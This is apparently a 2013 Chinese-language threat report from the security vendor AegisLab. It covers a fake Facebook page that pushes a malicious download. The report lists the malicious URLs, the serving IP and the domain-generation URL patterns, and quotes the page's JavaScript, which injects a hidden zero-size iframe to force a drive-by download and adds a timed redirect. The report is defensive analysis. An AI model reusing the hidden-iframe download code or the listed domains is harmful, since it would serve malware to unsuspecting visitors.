AegisLab近日收到一使用者回報的malicious website：hxxp://sleepy.tw/hedvig.html!

點選進去後，會看到一個很像facebook的頁面，上面寫著引人注意的字：

"You need to download and execute the facebook app to see it!  It's amazing!"

然後即自動下載一個有問題的檔案!

 

可以看到其download的iframe URL：hxxp://vclcxe.best.volyn.ua/dlimage11.php?yx=alsy

download的檔案在VirusTotal的偵測率：20/47

而根據AegisLab的觀察，此download的URL有其規律性，且IP皆為91.204.162.106：

'http://' + randomString(6) + '.best.volyn.ua/dlimage11.php?' + randomString(2) + '=' + randomString(4)

 

網頁裡的code可看到其iframe的規律：

function genDomain(){
  var sdom = 'http://' + randomString(6) + '.best.volyn.ua/dlimage11.php?' + randomString(
  2) + '=' + randomString(4);
  document.write('<iframe src="' + sdom + 
  '" width="0" height="0" frameborder="0"></iframe>');
}

 

(圖片來源：http://urlquery.net)

在urlquery搜尋"best.volyn.ua/dlimage11.php"此規則的URL，可以看到相當多的變化結果，

這些動態網域的產生，即是DGA(Domain Generation Algorithm)!

 

此頁面超過一段時間後，會自動把你導到：http://wickedreport.com(安全的網站)

window.setTimeout("document.location.href='http://wickedreport.com'", 120000)

 

AegisLab 已有相對應的signature可防護，提醒客戶隨時保持最新的signature以確保安全!

 

[2013.07.08 update]

此攻擊手法仍然存活，且陸續有新的malicious URL，並採取DGA方式，網域不斷的變換，經過AegisLab的觀察，這些malicious URL有2種規律性：

1. 'http://' + randomString(6) + '.best.volyn.ua/dlimage11.php?' + randomString(2) + '=' + randomString(4)
2. 'http://' + randomString(6) + '.best.lt.ua/dlimage4.php?' + randomString(2) + '=' + randomString(4)

截至2013.07.08 09:00為止，我們已經蒐集到了1355筆此2種規律的URL，AegisLab相對應的signature可安全防護，提醒客戶們隨時保持最新的signature，以確保安全!